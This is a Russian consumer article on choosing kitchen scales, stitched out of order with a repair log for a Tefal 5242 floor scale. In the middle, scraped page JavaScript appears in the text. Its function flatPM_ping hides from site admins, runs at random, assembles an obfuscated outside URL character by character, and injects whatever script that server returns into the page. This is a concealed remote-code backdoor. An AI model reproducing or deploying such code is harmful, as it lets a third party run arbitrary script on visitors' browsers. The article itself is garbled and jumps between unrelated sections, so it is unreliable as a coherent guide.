Как выбрать кухонные весы: несколько нюансов

Что и как показывают электронные весы?

Очевидно, что весы отображают вес продукта. Благодаря встроенному микроконтроллеру, прибор автоматически производит перерасчёт и показывает вес в килограммах, граммах или фунтах. Существуют модели, показывающие объём отмеренной жидкости в миллилитрах.

Определение объёма жидкости по весу будет точным, если её плотность близка к плотности воды. «Взвесив» таким способом 1 литр масла, вы получите в чаше 1086 миллилитров продукта. Некоторые модели весов учитывают этот факт и предлагают выбрать тип жидкости.

Есть модели весов, отображающие температуру в комнате и текущее время. Отдельные конструкции включают в себя даже будильник и таймер.

Цифровые индикаторы электронных весов различаются по размеру — от десятимиллиметровых циферок, до крупных знаков высотой в несколько сантиметров. Некоторые индикаторы подсвечиваются, но в этом случае батареи расходуются быстрее, «долгоиграющие» литиевые элементы в такие модели не ставят.

Почему может возникнуть погрешность?

Во всех торговых сетях контрольно-измерительная техника проходит ежегодную поверку и сертификацию. Но, поскольку электронные весы калибруются, недобросовестные предприниматели могут выставить, например, 950 граммов и запрограммировать их как килограмм. Покупателю весы будут показывать килограмм, но по факту недовес будет составлять 50 граммов.

Также погрешность при взвешивании может произойти в результате неправильных действий самого покупателя. Например, человек на кассе самообслуживания положил на весы свою покупку не очень аккуратно и получил один вес, а при повторном взвешивании цифра могла измениться.

Батареи питания

Все кухонные весы потребляют мало электроэнергии, поэтому для питания используются батарейки. Если у индикатора есть подсветка, то применяются элементы форм-фактора AA или AAA. Если у весов простой жидкокристаллический индикатор, то ставится литиевая батарейка CR2032 — о питании можно просто забыть, этого элемента легко хватает на год работы.

Все весы, питающиеся от батарей, автоматически выключаются после измерения, чтобы сберечь энергию.

Внешнее проявление неисправности весов

Пришлось ремонтировать напольные электронные весы Tefal 5242, которые неправильно показывали вес и сообщали об ошибке. При этом, если на платформу весов не прикалывалось давление, то индикатор не показывал.

Электронные весы Tefal 5242

При приложении силы, индикатор оживал и показывал вес.

Не правильные показания электронных весов Tefal 5242

Но результат измерений был на много меньше, реального веса человека. Вместо 70 кг весы показывали 29,7 кг.

Показание ошибки Е электронных весов Tefal 5242

Иной раз при взвешивании вместо случайного числа показывалась буква «Е» (error), обозначающая ошибку измерений.

Показания электронных весов Tefal 5242 после кратковременной нагрузки

Если на весы встать и быстро сойти, то стабильно высвечивались нули, что соответствовало действительности.

Электронных весов Tefal 5242

В весах отсутствовала возможность калибровки или других настроек. Можно было только с помощью кнопки UNIT с нижней стороны устанавливать единицы измерений веса, в кг или фунтах.

Для чего нужны кухонные весы

Легко понять, не обманули ли в магазине. Известны случаи, когда даже в заводской упаковке товара не хватает. Просто придите домой и взвесьте купленную продукцию. Узнаете, где приобретать товар не стоит.

Примечание! Миниатюрные кухонные весы умещаются в пакете, сумке. Берите прямо в супермаркет и проверяйте товар.

Опытная хозяйка знает, что и как делать, возникают случаи, когда хотите передать рецепт по наследству. Снохе, дочке и пр. Кухонные весы помогут с точностью до грамма определить дозировку ингредиентов. Сложность возникает при изучении новых рецептов. На глаз делать не нужно, просто берите кухонные весы и отвешивайте ровно столько, сколько указано.

Наконец, кухонные весы помогут соблюсти диету. Врачами (диетологами) прописывается суточное количество калорий, которое контролируете при готовке. И кушаете, сколько нужно. Специально для худеющих избранные кухонные весы дополнены встроенной информационной базой, одновременно с массой указывают энергетическую ценность продукции.

Иные модели допускают взвешивание, определение объема. Функция ограничена по возможностям. В Polaris PKS 0521, выполненных в виде электрочайника без крышки, имеется кнопка переключения между мукой, молоком, маслом, водой. Это нужно для правильного определения объема, хотя на боковой стенке в дополнение нанесена шкала с частыми рисками.

Другие важные критерии

Выбирая весы, обратите внимание на материалы, из которых изготовлены корпус и чаша. Эти части будут контактировать с пищей, поэтому должны быть качественными — от этого зависит ваше здоровье. Сталь должна быть нержавеющей — блестящей и яркой, пластик не должен резко пахнуть химией, стекло важно подобрать без трещин и сколов.

Поскольку вокруг весов готовится пища, а руки у пользователя не всегда чистые, важно обратить внимание на кнопки управления. Идеальный вариант — сенсорная панель, её очень легко очистить, такие кнопки никогда не залипнут.

Корпус настольных весов должен иметь резиновые ножки, чтобы не скользил по рабочей поверхности стола.

Как заменить батарейку в электронных весах

Поэтому для уточнения причины поломки весов в первую очередь следует проверить батарейку. Для этого весы нужно перевернуть и найти отсек, в котором она установлена.

Отсек для батарейки в электронных весах Tefal 5242

Для получения доступа к батарейке нужно пальцем или отверткой поддеть за выступ защелки крышки батарейного отсека и снять ее.

Батарейка CR2032 в электронных весах Tefal 5242

В электронных весах обычно встречается три типа батареек стандартного типоразмера – дисковые, ААА и АА, которые применяются и в других электроприборах. В ремонтируемых весах стояла литиевая дисковая батарейка CR2032. Так как в быту напольными весами пользуются редко, то литиевой батарейки хватает на несколько лет работы весов.

Извлечение батарейки CR2032 из электронных весов Tefal 5242

Батарейка удерживалась в отсеке за счет выступа, за который заходил ее край, благодаря давлению сбоку двумя подпружиненными контактами. Для извлечения батарейки нужно отвести ее в сторону от выступа с помощью острого предмета, например, отвертки.

Контакты для подключения батарейки CR2032 к электронным весам Tefal 5242

После изъятия батарейки нужно внимательно осмотреть ее поверхности и контакты в батарейном отсеке. Не должно быть потемнения и окислов в точках их касания с контактами батарейки. В любом случае будет полезным их промыть с помощью спирта или на крайний случай протереть сложенной в несколько слоев газетной бумагой.

После прочистки контактов нужно установить батарейку в отсек и проверить работу весов. Если причина была в окисленных контактах, то весы заработают.

Измерение напряжения батарейки CR2032

Если есть в наличии мультиметр или вольтметр, то нужно измерять величину напряжения на выводах батарейки. У литиевых напряжение должно составлять не менее 3,0 В, а у пальчиковых ААА и АА не менее 1,5 В. Если меньше, то батарейка выработала свой ресурс и подлежит замене.

Измерение напряжения у извлеченной батарейки CR2032 оказалось всего 2,92 В вместо 3,0. Поэтому ее пришлось заменить. У новой батарейки напряжение составило 3,3 В. Но чистка контактов и замена батарейки не восстановили работу весов и пришлось искать неисправность дальше.

Как проверить кухонные весы на точность

“:’

‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ c “

“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count “

“:’

‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ c “

“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(“flat_r_mb”,”zen.yandex”),flat_userVars.referer=”zen.yandex”);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(“div”)),r=(d.exec(e)||[“”,””])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,”<$1>”) r[2],l=r[0];l–;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “ng” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,r=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(“.flat__4_video”);-1!==l.indexOf(“go” “oglesyndication”)?t.append(l):flatPM_setHTML(t[0],l),e.find(“.flat__4_video_flex”).one(“click”,function(){n(this).addClass(“show”)})}),n(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=n(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),r=parseInt(o),l=setInterval(function(){a.text(–r),r<=0&&(clearInterval(l),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){n(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&n(“.flat__4_video_flex”).remove()})}

Какие выбрать кухонные весы

Придётся выбрать из критерия конструктивных особенностей платформы и чаши, когда дело доходит до форм-фактора кухонных весов. Выбираем первое – хранить удобнее. Чаша нужна, когда емкость съемная. Тогда весы легко превращаются в платформу, которую удобно хранить.

Встречаются весы-ложки, черпачки, в которых набранный продукт немедленно оценивается на тяжесть. На практике показано, что взвешивать можно единицы граммов. Авторам плохо понятно предназначение подобной техники – уж слишком мала.

Наконец, мы голосуем за функциональное оборудование, чтобы поменьше загромождать кухню. Случается, весы-ложка нужны, а настольные нет. Какие кухонные весы лучше купить – решайте самостоятельно!

Конструкция и материалы

Выбор конструкции весов зависит от ваших привычек на кухне и задач, для которых подбирается устройство.

Читайте также:  Настенные часы для кухни купить в интернет магазине

Кувшин – это самый простой тип весов, сделанный по принципу мерного стакана. Это не всегда удобная тара для готовки, но оптимальный вариант для измерения жидких и сыпучих продуктов. Измерение чаще происходит на объем, а не вес продуктов.

Безмен – рычажные пружинные весы, сделанные по типу подвеса. Вообще, отнести безмены конкретно к кухонных весам в современном понимании сложно. Отмерить ими муку или порцию каши на завтрак невозможно, а вот проверить, сколько весит пакет картошки – запросто.

Платформа – наиболее распространенный тип весов. Платформа бывает как с чашей, так и без. Первый вариант удобен тем, что вы можете отмерять продукты в той посуде, в которой вам самим нужно и удобно. С другой стороны, чаша решает вопрос дополнительной тары.

Самый универсальный вариант – это платформа со съемной чашей, когда вы можете сами выбрать, в чем и как работать в той или иной ситуации. К примеру, нет смысла пачкать чашу, если вы хотите взвесить свой обед прямо в тарелке или измерить несколько грамм приправ, которые впоследствии даже собрать в большой чаше не сможете. А вот смешать ингредиенты для бисквитного теста удобно прямо в чаше весов. Каждой задаче – свое решение.

Кухонные весы стандартно изготавливаются из пластика, нержавеющей стали и стекла. Иногда материалы могут быть скомбинированы. Например, платформа из пластика, чаша – из стекла или стали.

Пластик – легкий, легко отмывается. Модели из пластика часто ярких расцветок с принтами и рисунками вроде фруктов и овощей. Чаша из пластика – тоже неплохой вариант. Однако такую чашу нужно тщательно отмывать и перед замешиванием кондитерского теста желательно дополнительно обезжиривать, так как пластик впитывает жир и запахи продуктов.

Стекло – как понятно, материал хрупкий. Несмотря на то, что и корпус и чаша делаются из прочного, термостойкого толстого стекла, но разбить его все-таки можно и лишний раз на пол лучше не ронять. Зато в стеклянных чашах отлично замешивается тесто, удобно и легко взбивать белки для безе.

Сталь – самый крепкий материал. Не боится вообще ничего – ни падений, ни контакта с любой пищей (кроме очень активных кислот и щелочей), легко моется, ничего не впитывает. Весы из стали прекрасно впишутся в ультрасовременные хай-тек кухни, где модели с цветастыми помидорками и апельсинами на корпусе попросту не подойдут.

Кто занимается поверкой весов?

Проверкой весов в России занимаются Роспотребнадзор и Федеральное агентство по техническому регулированию и метрологии (Росстандарт), а также аккредитованные при нем юридические лица и индивидуальные предприниматели. При несанкционированной настройке, например, отсутствии целостности пломбы или вмешательстве, к недобросовестным продавцам применяются административные и уголовные меры наказания.

Материал

Пластик. Этот прочный и лёгкий материал отлично моется. Использование практичного пластика дает возможность экспериментировать с формой и дизайном устройств, благодаря чему вы легко подберете модель под цвет кухни. Такие модели отличаются доступной ценой.

Стекло. Чтобы такой прибор служил долго, при производстве применяется ударо- и жаропрочное стекло, которое не лопнет от высоких температур или при падении. Весы со стеклянной панелью или чашей смотрятся эстетично и современно.

Нержавеющая сталь. Один из самых практичных материалов. Он не подвержен физическому и тепловому воздействию. Металлическую чашу невозможно разбить, а корпус из нержавейки выдерживает большие нагрузки.

Дерево. В производстве используются плотные породы дерева, обработанные специальными покрытиями, которые сохранят текстуру и защитят материал от воздействия влаги. Устройство с деревянной платформой выбирают, если обстановка или отделка кухни выполнена из массива дерева.

Нужно ли брать кухонные весы с подсчетом калорий

Люди часто сегодня пытаются похудеть. Полезно правильно подбирать продукты.

Кухонные весы с расчетом калорий имеют заложенную заблаговременно информационную базу с таблицами белков, жиров, углеводов и калорий. У ряда моделей возможно заносить собственные числа. Используются такие модели в паре с напольными весами, умеющими считать жировую массу тела.

В результате взвешивания человеку, помимо показаний, даются рекомендации по потреблению калорий. Указанную цифру используйте при готовке. Калорийность продуктов уже занесена, остается с карандашиком суммировать показания кухонных весов. Приготовленная еда делится на порции, каждый кушает отмеренное.

Становится проще соблюдать диету, результат контролируйте напольными весами (часто называют «био» за способность измерить биометрические параметры). Полагаем, что действие поспособствует выработке правильной тренировочной программы. Имеются нюансы. К примеру, бодибилдеры при готовке курицы стараются кожицу снимать, в покровах птицы содержится львиная доля бесполезных для накачки животных жиров.

Кухонные весы с подсчетом калорий стоят дороже.

Парочка нюансов

При наблюдении за кухонными весами Sinbo SKS 4513 заметите, что показания мечутся. Это подобие режима реального времени не радует. К примеру, на видео при помещении на платформу гирьки 50 г цифра скачет. С нашей точки зрения, гораздо лучше смотрятся модели Maxwell, где приемлемое время (пару-тройку) секунд ведутся измерения, затем на дисплее появляется индикатор, показывающий, что масса груза оценена.

По индикации можно судить, окончены ли измерения.

Элементы питания кухонных весов:

  • Батарейки АА (пальчиковые).
  • Батарейки ААА (мизинчиковые).
  • «Таблетки» на 1,5 В.

Цена важна. В магазинах типа FixPrice иногда найдутся элементы питания по привлекательной стоимости. Лучше заранее оценить аспект и выбирать кухонные весы сообразно наименьшим тратам.

Наконец, на прилавке ценовой диапазон необъятный. Не станет ошибкой купить недорого весы кухонные. Во-первых, производители много накидывают за громкое имя, во-вторых, кухонные весы – товар, где качество играет малую роль. Центральный электронный блок выполняет простейшие вычисления, а тензодатчики по большому счету одинаковые. Скажем больше – недорогие кухонные весы не жаль выбросить в случае выхода из строя.

Если купить кухонные весы со съёмной чашей, получается вдобавок неплохая салатница. Напоминаем, что пластик, предназначенный для контакта с пищевыми продуктами, помечается значком вилки и кружки. Ищите рисунок, либо не используйте емкость по указанному назначению.

Надеемся, что помогли выбрать кухонные весы. Главное понять, что прибор недорогой, следовательно, придираться к свойствам сильно не стоит.

Платформа или чаша?

Самые простые электронные весы представляют собой круглую или прямоугольную подвижную платформу для взвешивания предмета.

Для определения веса яблоко или пакет с мукой ставятся непосредственно на платформу. Сахар или крупу лучше так не взвешивать — рассыплется. Уборка стола, мойка весов и пола — гарантированы. Для сыпучих продуктов требуется отдельная тарелка или миска.

Для точного измерения вес посуды следует компенсировать. У электронных весов есть специальная кнопка, обнуляющая показания индикатора при установленной на платформу посуде.

В продаже имеются электронные весы с собственной чашей, которая бывает съёмной и несъёмной. Рекомендуется выбирать прибор со съёмной чашей — её легко снять и помыть, не рискуя повредить прибор. Такую чашу удобно использовать в качестве посуды и смешивать продукты прямо в ней.

Благодаря функции обнуления, на весах с чашей легко смешать полезный салат. Ставим чашу на платформу, а затем обнуляем вес после добавления компонента. Повторяем цикл ещё раз.

По предельному весу продуктов

Выбирая весы для домашнего хозяйства, решите, что вы будете взвешивать. У каждого прибора есть ограничение по весу продукта. Для выпечки пирогов и блинов подойдут весы с предельным весом 5 кг. Если вы заготавливаете варенье, то лучше взять прибор, способный взвесить до 10 кг сахара.

Электронные весы снабжены индикатором перевеса. Звуковой сигнал или индикатор сообщит о превышении допустимого порога.

Точность взвешивания у цифровых устройств определяется единицей в младшем разряде индикатора. Для домашнего хозяйства достаточно точности в 1 г. Существуют и более точные весы, их используют профессионалы — аптекари, ювелиры, химики и банкиры.

По принципу измерения

По принципу измерения весы делятся на механические и электронные.

Во всех механических приборах стрелка напрямую связана с пружиной и двигается вместе с ней. Измерительная шкала заранее проградуирована в единицах веса. Чем тяжелее предмет, тем больше отклонение стрелки. Достоинства: прибору не нужно электропитание, в нём нечему ломаться. Недостатки: погрешность измерения (в 25 – 50 г), пружина со временем меняет форму, и без того невысокая точность ещё снижается.

В электронных приборах вместо пружин используются тензодатчики, преобразующие деформацию материала под нагрузкой в электрический сигнал. Микроконтроллер измеряет ток, поступающий от датчика, и рассчитывает вес продукта. Недостаток: не работают без батареек. Достоинства: высокая точность взвешивания (до 0,1 грамма), чёткий цифровой индикатор, простое обнуление показаний, реализованы дополнительные полезные функции.

Читайте также:  Шторы на кухню - купить шторы на кухню в Симферополе от 1377 ₽ - интернет-магазин Домштор

По способу взвешивания продукта

По способу взвешивания различают ручные и настольные весы.

Ручные весы — лёгкие и компактные, их несложно брать в магазин или на базар, чтобы проверить честность продавца. С одной стороны корпуса — кольцо, его берут в руки. С другой — крючок для сумки с продуктами, между ними — пружина. Под действием силы тяжести пружина растягивается, прикреплённая к ней стрелка показывает вес продукта.

Ручные пружинные весы в народе называют «безмен», однако настоящий безмен — это простейшие рычажные весы. При взвешивании безмен следует держать строго вертикально и неподвижно, под наклоном он будет показывать меньший вес.

Настольные весы не предназначены для переноски за пределы квартиры, они весят до 1 килограмма и занимают несколько десятков квадратных сантиметров стола. Взвешиваемый продукт помещается на платформу или чашу, которая опускается под действием силы тяжести, и этот сдвиг показывает индикатор.

Для взвешивания продуктов на кухне рекомендуется выбирать настольные весы.

Если на маленькой кухне нет места, рекомендуется приобрести настенные весы. Принцип действия у них такой же, как и у настольных. Корпус, выполненный в форме буквы L, вертикальной частью привинчивается к стене. Если платформа не используется, её можно поднять, так будет ещё компактнее.

Владельцы хлебопечек по достоинству оценят весы-ложку. Дело в том, что для выпекания хлеба очень важно соблюсти пропорции соли, дрожжей и добавок. Если в рецепте указан вес компонентов в граммах, то отмерить порошки с помощью весов-ложки не составит труда.

Подсчёт калорий

Для специальных лечебных диет жизненно важно соблюдать правильное питание. Ряд моделей весов помогает оценить калорийность продуктов.

Например, диетические весы Zelmer KS1700 содержат в памяти список из 999 продуктов с характеристиками: калорийность, белковый и жировой состав. Для получения информации о продукте в момент взвешивания пользователь определяет код продукта по бумажному справочнику, а затем набирает код на весах с помощью сенсорных кнопок.

Справочник в физической памяти весов слишком мал, чтобы охватить всю существующую в мире еду, его невозможно обновить и дополнить. Инженеры компании Redmond перенесли каталог продуктов в сеть Интернет. Весы Redmond SkyScale 741S подключаются к смартфону по Bluetooth и передают в программу Ready for Sky вес продукта.

Проверка исправности тензодатчиков

Так как внешний осмотр печатной платы на предмет некачественных паек проводов и элементов неисправностей не выявил, пришлось заняться детальной проверкой тензодатчиков.

Измерение сопротивления тензодатчиков электронных весов Tefal 5242

Для исключения влияния элементов схемы на сопротивление тензодатчиков по два из трех проводов каждого из тензодатчиков были отпаяны (красного и черного цветов). Далее с помощью мультиметра, включенного в режим измерения сопротивления, было измерено сопротивление каждой из восьми пленок тензодатчиков. Сопротивление каждой из них было равно и составило 1,0 кОм.

Ножка с тензодатчиком электронных весов Tefal 5242

Несмотря на равенство сопротивлений тензодатчиков решил добраться до них для визуальной проверки на наличие механических повреждений.

Отжатие защелки удерживающей ножку с тензодатчиком электронных весов Tefal 5242

Металлическая пластина, на которой был установлен тензодатчик, фиксировалась в корпусе с помощью двух защелок. Для освобождения пластины достаточно отвести с помощью отвертки в сторону одну из них.

Ножка с тензодатчиком электронных весов Tefal 5242

После извлечения пластины оказалось, что ножка на ней надежно зафиксирована и поэтому не отделяется.

Крепление  тензодатчика на ножке электронных весов Tefal 5242

Оказалось, что в ножке есть углубление, в котором размещалась пластина и дополнительно фиксировалась двумя защелками.

Крепление  тензодатчика на металлической пластине электронных весов Tefal 5242

Осмотр всех четырех пластин не выявил их деформации, тензодатчики были покрыты пластичным компаундом. Провода были целые.

Разборка весов

Для дальнейшего поиска неисправности необходимо разобрать весы. Для этого нужно их перевернуть ножками вверх и снять П-образную крышку.

Защитная крышка с Электронных весов Tefal 5242 снята

Крышка закреплена двумя винтами в зоне индикатора и по одному винту в зоне ближайших к нему ножек. У дальних ножек концы крышки фиксируются защелками. Вся пластмассовая конструкция к стеклянной платформе приклеена с помощью двухстороннего скотча, но ее отсоединять для ремонта не нужно.

Разновидности кухонных весов

Не рекомендуем брать механические кухонные весы, велика погрешность. В электронных при правильном выравнивании груза точность достигает 1 грамма. Разницы хватит в подавляющем большинстве случаев.

  1. У кухонных весов чашу изготавливают произвольной формы. Пуще прежнего разыгрался Polaris. Фирма выпускает «кувшины», «чашки» и прочие необычные конструкции. Продаются весы кухонные настенные. Что касается Яндекс-маркета, там выделяют по группам параметров три типа: ложки, платформы и чаши. Добавим, что иной раз емкости снимаются с кухонных весов, это удобно. Легко превращается прибор в платформу, куда поставите стакан и прочие приборы.
  2. Иногда получается – хотим смешать 3-5 ингредиентов. Но пока доставали из шкафа муку, кухонные весы автоматически выключились, чтобы сберечь энергию. Первый ингредиент уже добавлен. Продолжайте работать, будто ничего не случилось – после включения кухонные весы обнуляются, находящееся на платформе потеряет массу в глазах приспособления. Добавьте муку, ориентируясь на рецептуру. Применяйте намеренно. Добавьте в чашу первый ингредиент, специальной кнопкой обнулите показания, примешайте второй (проще, нежели считать суммарный вес). Если молоко, к примеру, уже в кружке – поставьте на весы, обнулите показания, выпейте и поставьте на платформу опорожненную емкость. Отрицательное значение равно массе молока. Это недокументированное качество электронных кухонных весов – взвешивают и в отрицательную сторону. В этом случае убавьте ингредиенты на заданную массу. Это недокументированное свойство, не беремся сказать, насколько далеко диапазон простирается в отрицательную сторону.
  3. Предельная масса взвешивания показывает, сколько водрузить еды на платформу, чтобы прибор не поломать. Превышение указанного веса с вероятностью 100% приведет к выходу из строя либо потере точности. Типичное значение параметра – 5 кг. Встречаются модели большего диапазона. Полагаем, что типичных 5 кг для кухонных весов достаточно.
  4. Материал чаши, стол различен. Сегодня чаще встречаются пластик, стекло (закаленное), сталь. По нашему мнению – лучше пластик. Легкий и дешевый, а кухонные весы не тарелка, чтобы постоянно мыть и чистить (разрекламированный плюс стеклянных изделий). Лучше при покупке убедитесь, что кнопок нет. Простая, гладкая, сенсорная панель управления. Без щелей. Ориентируйтесь на это. Что касается формы, очертания разнообразные. Хороши кухонные весы круглые. Удобные для хранения, поместятся в сумке.
  5. Избранные весы умеют считать калории. Решайте самостоятельно, нужное ли качество.
  6. Срок годности весов стараются ставить минимальным, 1-2 года. Шаг нацелен на желание избежать ответственности при поломке прибора. На практике кухонные весы проработают намного дольше. Конкретный срок зависит от условий эксплуатации.

Советы по выбору

Если вам не особенно-то и важно взвешивать в граммах и достаточно знать хотя бы приблизительные значения, берите простые механические весы.

Для более точных измерений – только электронные. Причем, для кулинарных экспериментов и кондитерских изысков лучше брать максимально точные модели с несколькими единицами измерений.

Вы – фермер и взвешиваете лук не головками, а килограммами, а морковку не граммами, а мешками? Тогда вам определенно пригодится безмен.

Любите все держать под собственным контролем и каждый ингредиент раскладывать по индивидуальным чашечкам или планируете взвешивать свой завтрак и следить за питанием? Берите весы-платформы без чаши. Ну, а для тех, кто за многофункциональные приборы – весы с чашей.

Самым продвинутым пользователям – весы со съемной чашей.

Тип весов

Сперва нужно определиться с типом весов. Они бывают механические и электронные. Первые постепенно уходят в небытие, как устаревший и далеко не самый точный вариант. В механических весах измерение происходит благодаря давлению на пружину.

Куда лучше дело обстоит с электронными весами, у которых за работу отвечает специальный датчик. Питание осуществляется за счет батареек разных типов.

Чтобы понять, насколько вам подходит конкретная модель весов, обращайте внимание на параметр точности измерений, который показывает допустимую погрешность в данных. Если весы нужны вам для кулинарных экспериментов, значение должно быть самым низким.

Типичные кухонные весы

